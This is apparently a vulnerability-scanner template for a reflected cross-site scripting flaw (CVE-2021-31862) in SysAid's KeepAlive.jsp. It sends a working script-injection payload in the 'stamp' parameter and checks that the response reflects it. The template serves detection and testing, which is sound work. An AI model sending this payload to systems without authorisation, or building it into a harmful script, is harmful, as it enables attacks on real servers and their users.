33 lines
944 B
YAML
33 lines
944 B
YAML
id: CVE-2021-31862
|
|
|
|
info:
|
|
name: SysAid 20.4.74 - Cross-Site Scripting
|
|
author: jas37
|
|
severity: medium
|
|
description: SysAid 20.4.74 contains a reflected cross-site scripting vulnerability via the KeepAlive.jsp stamp parameter.
|
|
reference:
|
|
- https://github.com/RobertDra/CVE-2021-31862/blob/main/README.md
|
|
- https://www.sysaid.com/product/on-premise/latest-release
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-31862
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-31862
|
|
cwe-id: CWE-79
|
|
tags: cve,cve2021,xss,sysaid
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- '(body == "false <script>alert(document.domain)</script>")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
|
|
# Enhanced by mp on 2022/08/28
|